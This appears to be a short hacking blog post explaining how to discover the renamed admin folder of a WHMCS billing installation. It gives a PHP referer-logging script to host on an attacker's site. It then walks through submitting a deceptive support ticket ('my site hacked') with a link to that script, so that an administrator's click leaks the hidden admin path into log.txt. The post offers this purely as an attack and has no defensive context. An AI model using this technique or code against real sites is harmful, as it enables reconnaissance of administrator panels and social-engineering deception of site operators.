whmcs get control panel
this time i'll explain how to get
the admin control panel in whmcs script in case the admin change the
folder name of the admin panel ...



so we will use this code

Quote:


<?php
$where
=$_SERVER['HTTP_REFERER'];
$fp = fopen('log.txt', 'a');
fwrite($fp, $where."\n");
fclose($fp);
?>

okay now the main trick in this thread .. how you will use it ?



upload the file in any site you have and create a ticket and put the link and try to make the admin click on the link



example :



victim.com/whmcs/submitticket.php



1- add ticket

2- write example: hi my site hacked --> hacked.com/log.php



wait until the admin click on the link and you will recieve the control folder in new file with name log.txt


Post a Comment

 
Top
Google+